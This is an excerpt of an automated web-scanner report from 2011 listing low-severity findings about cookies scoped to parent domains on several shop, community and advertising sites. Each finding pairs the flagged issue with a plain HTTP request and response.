HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:55:48 GMT
Server: Apache
Set-Cookie: SHOP_SESSION_TOKEN=at9kctjodfv3r3iam6cs56aqf7; expires=Tue, 26-Apr-2011 23:55:48 GMT; path=/ecommerce/; domain=.clone-systems.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 24887

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
   


...[SNIP]...

14.4. http://www.clone-systems.com/ecommerce/categories/Penetration-Testing/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.clone-systems.com
Path:   /ecommerce/categories/Penetration-Testing/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ecommerce/categories/Penetration-Testing/ HTTP/1.1
Host: www.clone-systems.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CMSSESSIDe4d04fcf=rqtsjtdic4ntsneeiknvckvj63

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:55:49 GMT
Server: Apache
Set-Cookie: SHOP_SESSION_TOKEN=t5s0kmeibbbtts6cq9hfdffs02; expires=Tue, 26-Apr-2011 23:55:49 GMT; path=/ecommerce/; domain=.clone-systems.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 21466

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
   


...[SNIP]...

14.5. http://www.clone-systems.com/ecommerce/categories/Vulnerability-Scan-Services/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.clone-systems.com
Path:   /ecommerce/categories/Vulnerability-Scan-Services/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ecommerce/categories/Vulnerability-Scan-Services/ HTTP/1.1
Host: www.clone-systems.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CMSSESSIDe4d04fcf=rqtsjtdic4ntsneeiknvckvj63

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:55:47 GMT
Server: Apache
Set-Cookie: SHOP_SESSION_TOKEN=bk4mm1ag6ue392h3jsauk88r25; expires=Tue, 26-Apr-2011 23:55:47 GMT; path=/ecommerce/; domain=.clone-systems.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 23560

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
   


...[SNIP]...

14.6. http://www.clone-systems.com/ecommerce/index.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.clone-systems.com
Path:   /ecommerce/index.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ecommerce/index.php?action=tracking_script HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.clone-systems.com

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 00:25:33 GMT
Server: Apache
Set-Cookie: SHOP_SESSION_TOKEN=o07bfks454r08e1ev5t4uf6is4; expires=Wed, 27-Apr-2011 00:25:33 GMT; path=/ecommerce/; domain=.clone-systems.com
Expires: Tue, 03 May 2011 00:25:33 +0000
Cache-Control: public,maxage=604800
Pragma: public
Content-Length: 190
Content-Type: text/javascript


               var img = new Image(1, 1);
               img.src = 'http://www.clone-systems.com/ecommerce/index.php?action=track_visitor&'+new Date().getTime();
               img.onload = function() { return true; };
           

14.7. http://www.hugthecloud.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.hugthecloud.com
Path:   /

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.hugthecloud.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 13:18:27 GMT
Server: Jetty/5.1.15 (SunOS/5.10 x86 java/1.6.0_03
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: xn_visitor=ee890453-6b17-46ae-a9d8-af6fdfda375d;Path=/;Domain=.hugthecloud.com;Expires=Fri, 23-Apr-21 13:18:27 GMT
Set-Cookie: ning_session=3DtBNRdYb0ZI8bIxNwyKF8vI8uD7jqsGwx9yRIPU6xi52l4UL5heqChGDHvXjopviwdKMsemcLE=;Path=/;Domain=.hugthecloud.com;Expires=Tue, 26-Apr-11 14:18:27 GMT
X-XN-Trace-Token: 94f68857-016c-408c-9214-fd573d274bbe
X-XN-XNHTML: false
Date: Tue, 26 Apr 2011 12:39:16 GMT
Date: Tue, 26 Apr 2011 12:39:16 GMT
Vary: X-XN_APPLICATION
P3P: CP="UNI STA LOC CURa OURa COR ALL IND"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Last-Modified: Tue, 26 Apr 2011 12:39:16 UTC
CACHE-CONTROL: max-age=0
CACHE-CONTROL: no-cache="Set-Cookie"
Content-Type: text/html; charset=utf-8
Server: Ning HTTP Server 2.0
Content-Length: 54058

<!DOCTYPE html>
<html lang="en">
<head data-layout-view="default">
<script>(function(){var d={date:8,app:"s",host:"s",ip:4,ua:"s",user:"s",url:"s",html:4,css:4,render:4,js:4,nlr:4,nlr_eval
...[SNIP]...

14.8. http://www.hugthecloud.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.hugthecloud.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: www.hugthecloud.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: xn_visitor=367ebb41-9a4a-4792-a848-e329e8f51d58; ning_session=JqIvd+vE/aq+TxfD6DNxfrwKspEymAzf4jDvQHmTVN4Abhhcdp6LFBsMRGdDlgSH6V+jaPEOm0Y=; 2__utmz=^ning.1319591918512:85044224.1303823919.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 2__utmv=^ning.1303823918511:; 2__utma=^ning.1366895918512:85044224.1282109851.1303823919.1303823919.1303823919.1; 2__utmc=^ning.1366895918512:85044224; 2__utmb=^ning.1303825718512:85044224.1.10.1303823919; xn_track=rp%252C%25252F%252Crc%252C0%252Csi%252C1303823924%252Cse%252C1303824824

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 13:18:42 GMT
Server: Jetty/5.1.15 (SunOS/5.10 x86 java/1.6.0_03
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: ning_session=JqIvd+vE/aq+TxfD6DNxfrwKspEymAzf4jDvQHmTVN4Abhhcdp6LFGef0Np4Of2wCuLXfA8BPNs=;Path=/;Domain=.hugthecloud.com;Expires=Tue, 26-Apr-11 14:18:42 GMT
X-XN-Trace-Token: 1e53f0bd-ed7d-431f-993e-ef218725020a
ETag: "db9c1-483-45a88f5754cc0"
Date: Tue, 26 Apr 2011 12:36:52 GMT
Date: Tue, 26 Apr 2011 12:36:52 GMT
Vary: X-XN_APPLICATION
P3P: CP="UNI STA LOC CURa OURa COR ALL IND"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Last-Modified: Fri, 31 Oct 2008 09:09:47 GMT
CACHE-CONTROL: max-age=0
CACHE-CONTROL: no-cache="Set-Cookie"
Content-Type: image/x-icon
Accept-Ranges: bytes
Server: Ning HTTP Server 2.0
Content-Length: 1155

............ .h.......(....... ..... .....@.............................................................................................................................................................
...[SNIP]...

14.9. http://www.m8security.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.m8security.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.m8security.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:45:19 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: SESSa3ee040a33364f343ddaa1d4cf0e6bab=2q12tlg89jgpaked26837s8347; expires=Thu, 19 May 2011 03:18:39 GMT; path=/; domain=.m8security.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 23:45:19 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 11908

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head
...[SNIP]...

14.10. http://109.xg4ken.com/media/redir.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://109.xg4ken.com
Path:   /media/redir.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /media/redir.php?prof=56&camp=3086&affcode=kw134&cid=10327990298&networkType=search&url[]=http%3A%2F%2Fservedby.flashtalking.com%2Fclick%2F16008%3B128708%3B94221%3B230%3B3%2F%3Furl%3Dhttp:%2F%2Fresponse.firstdata.com%2F%3FelqPURLPage%3D15 HTTP/1.1
Host: 109.xg4ken.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Mon, 25 Apr 2011 23:44:03 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Set-Cookie: kenshoo_id=2c557654-692b-10a8-2a58-00004d95d016; expires=Sun, 24-Jul-2011 23:44:03 GMT; path=/; domain=.xg4ken.com
Location: http://servedby.flashtalking.com/click/16008;128708;94221;230;3/?url=http://response.firstdata.com/?elqPURLPage=15
P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


14.11. http://ad.amgdgt.com/ads/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.amgdgt.com
Path:   /ads/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ads/?t=i&f=j&p=5112&pl=bb9cfe77&rnd=81239918339997540&clkurl=http://ib.adnxs.com/click/PQrXo3A9DEA9CtejcD0MQBLaci7FlQBApHA9CtcjE0CkcD0K1yMTQFUcOaKahDtdSsYda6b2ziXJ1LZNAAAAAEQwAAC1AAAAlgIAAAIAAADEpAIA0WMAAAEAAABVU0QAVVNEAHgAWAJhDE0AAg0BAgUCAAQAAAAAlx8LKgAAAAA./cnd=!uA56ZAiQmQMQxMkKGAAg0ccBKE0xMzMzEdcjE0BCCggAEAAYACABKAFCCwifRhAAGAAgAygBQgsIn0YQABgAIAIoAUgBUABY4RhgAGiWBQ../referrer=http%3A%2F%2Fwww.spamlaws.com%2Fspam-blocker.html/clickenc=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBOnjTydS2TfGKEci1sQfR6qWJAdfq-NMBp5-U7Bjrwu3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi01MjUzODA5NDMwOTQwNDEwoAHD8v3sA7IBEHd3dy5zcGFtbGF3cy5jb226AQoxMjB4NjAwX2FzyAEJ2gEpaHR0cDovL3d3dy5zcGFtbGF3cy5jb20vc3BhbS1ibG9ja2VyLmh0bWyYAsobwAIEyAKF0s8KqAMB6AO6AugDigP1AwAAAMSABrqkhf7K9qWnTw%26num%3D1%26sig%3DAGiWqtyey6ImO1eOpu-MUOoG2tgmoZ9VPg%26client%3Dca-pub-5253809430940410%26adurl%3D HTTP/1.1
Host: ad.amgdgt.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-5253809430940410&output=html&h=600&slotname=1644788465&w=120&lmt=1303845665&flash=10.2.154&url=http%3A%2F%2Fwww.spamlaws.com%2Fspam-blocker.html&dt=1303827665898&bpp=8&shv=r20110420&jsv=r20110415&prev_slotnames=8319948044%2C1020003104%2C9565114904%2C0023118579&correlator=1303827663964&frm=0&adk=222637912&ga_vid=902403751.1303827664&ga_sid=1303827664&ga_hid=1845423620&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=965&bih=956&fu=0&ifi=5&dtd=13&xpc=gvNjmv27ZD&p=http%3A//www.spamlaws.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=AAAAAQAU6fB5bLIqJTbWvlzW3Ft0OcZJYxcAANGoPMSHa0D5h6539_dUjA0AAAEvZiIaJw--; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAUxOdW3WQldyr.xNlqt1dY_m2yKF0DA3gBY2BgEGFg6lzCwJLdysDI.4OB4YYrAwMDJwMDo34vxzZvqFwLUO4nUM4NIefSj0uuIzvmFE65JLfrOOUivK7hlPObEIJTzrWBAyrXBnTnd6A7XWDu7JBwv41Tn4SdNi597Sd3bsKlr_3kjFqccieEF.OUO7bgEU65o18FccrNWMCOW862Fafc9IeeuOU6VuKWM9XFKTftpiIwbBlxyld2CwHlGXy37Gxg4AAmpJ2MjIwMDIG3GJmBFIMBE4MIiK9gBhZeWgAWZslkZAMKsoQwsTGyAxnyu5gYuEHKwGnQB2QeAwMAUdqQwA--

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: UA=AAAAAQAUKF.3vTpKG5CpzwVpYH3m5EI9n_UDA3gBY2BgEGFg6lzCwJLdzMDI.4uB4YY7AwMDJwMDo_4k_VhlqFwrUO4HUM4VJtfLsc0bKtcClPsJlHNDyLn045LryI45hVMuye06TrkIr2s45fwmhOCUc23ggMq1Ad35HehOF5g7OyTcb.PUJ2GnjUtf.8mdm3Dpaz85oxan3AnhxTjlji14hFPu6FdBnHIzFrDjlrNtxSk3_aEnbrmOlbjlTHWB4ceIU76yWwgoz.C7jZuBgQOYkHYyMjEyMATeYmQBUgwGzAwijGARBTMwtbQALMGSycgOlGcJYWJn5AAy5HcxM3BBFELTIchQBgBQFY53; Domain=.amgdgt.com; Expires=Thu, 26-May-2011 14:21:08 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 3896
Date: Tue, 26 Apr 2011 14:21:07 GMT

_289667_amg_acamp_id=166308;
_289667_amg_pcamp_id=69114;
_289667_amg_location_id=55367;
_289667_amg_creative_id=289667;
_289667_amg_loaded=true;
var _amg_289667_content='<script type="text/javascript"
...[SNIP]...

14.12. http://ar.voicefive.com/b/wc_beacon.pli  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/wc_beacon.pli

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/wc_beacon.pli?n=BMX_G&d=0&v=method-%3E-1,ts-%3E1303827675.212,wait-%3E10000,&1303827686144 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-5253809430940410&output=html&h=600&slotname=1644788465&w=120&lmt=1303845665&flash=10.2.154&url=http%3A%2F%2Fwww.spamlaws.com%2Fspam-blocker.html&dt=1303827665898&bpp=8&shv=r20110420&jsv=r20110415&prev_slotnames=8319948044%2C1020003104%2C9565114904%2C0023118579&correlator=1303827663964&frm=0&adk=222637912&ga_vid=902403751.1303827664&ga_sid=1303827664&ga_hid=1845423620&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=965&bih=956&fu=0&ifi=5&dtd=13&xpc=gvNjmv27ZD&p=http%3A//www.spamlaws.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p97174789=exp=24&initExp=Sun Apr 24 12:09:48 2011&recExp=Tue Apr 26 14:21:11 2011&prad=253732015&arc=178113848&; BMX_G=method->-1,ts->1303827671; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Apr 2011 14:21:16 GMT
Content-Type: image/gif
Connection: close
Vary: Accept-Encoding
Set-Cookie: BMX_G=method%2D%3E%2D1%2Cts%2D%3E1303827675%2E212%2Cwait%2D%3E10000%2C; path=/; domain=.voicefive.com;
Content-length: 42
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent

GIF89a.............!.......,........@..D.;

14.13. http://ar.voicefive.com/bmx3/broker.pli  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732015&AR_C=178113848 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-5253809430940410&output=html&h=600&slotname=1644788465&w=120&lmt=1303845665&flash=10.2.154&url=http%3A%2F%2Fwww.spamlaws.com%2Fspam-blocker.html&dt=1303827665898&bpp=8&shv=r20110420&jsv=r20110415&prev_slotnames=8319948044%2C1020003104%2C9565114904%2C0023118579&correlator=1303827663964&frm=0&adk=222637912&ga_vid=902403751.1303827664&ga_sid=1303827664&ga_hid=1845423620&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=965&bih=956&fu=0&ifi=5&dtd=13&xpc=gvNjmv27ZD&p=http%3A//www.spamlaws.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p97174789=exp=23&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:20:50 2011&prad=253732017&arc=194941023&; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Apr 2011 14:21:11 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=24&initExp=Sun Apr 24 12:09:48 2011&recExp=Tue Apr 26 14:21:11 2011&prad=253732015&arc=178113848&; expires=Mon 25-Jul-2011 14:21:11 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1303827671; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25091

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732015",Pid:"p97174789",Arc:"178113848",Location:
...[SNIP]...

14.14. http://b.scorecardresearch.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=7&c2=8097938&rn=1114821727&c7=http%3A%2F%2Fseg.sharethis.com%2FgetSegment.php%3Fpurl%3Dhttp%253A%252F%252Fwww.tenable.com%252Fservices%252Fnessus-perimeter-service%253Fgclid%253DCNLb8cPsuKgCFQbe4AodEirYCA%26jsref%3D%26rnd%3D1303775074503&c3=8097938&c8=ShareThis%20Segmenter&c9=http%3A%2F%2Fwww.tenable.com%2Fservices%2Fnessus-perimeter-service%3Fgclid%3DCNLb8cPsuKgCFQbe4AodEirYCA&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://seg.sharethis.com/getSegment.php?purl=http%3A%2F%2Fwww.tenable.com%2Fservices%2Fnessus-perimeter-service%3Fgclid%3DCNLb8cPsuKgCFQbe4AodEirYCA&jsref=&rnd=1303775074503
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Mon, 25 Apr 2011 23:45:19 GMT
Connection: close
Set-Cookie: UID=25894b9d-24.143.206.177-1303083414; expires=Wed, 24-Apr-2013 23:45:19 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


14.15. http://b.scorecardresearch.com/p  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /p

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p?c1=8&c2=6035179&c3=1&c4=69114&c5=166308&c6=&cv=1.3&cj=1&rn=1263260761 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-5253809430940410&output=html&h=600&slotname=1644788465&w=120&lmt=1303845665&flash=10.2.154&url=http%3A%2F%2Fwww.spamlaws.com%2Fspam-blocker.html&dt=1303827665898&bpp=8&shv=r20110420&jsv=r20110415&prev_slotnames=8319948044%2C1020003104%2C9565114904%2C0023118579&correlator=1303827663964&frm=0&adk=222637912&ga_vid=902403751.1303827664&ga_sid=1303827664&ga_hid=1845423620&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=965&bih=956&fu=0&ifi=5&dtd=13&xpc=gvNjmv27ZD&p=http%3A//www.spamlaws.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Tue, 26 Apr 2011 14:21:10 GMT
Connection: close
Set-Cookie: UID=25894b9d-24.143.206.177-1303083414; expires=Thu, 25-Apr-2013 14:21:10 GMT; path=/; domain=.scorecardresearch.com
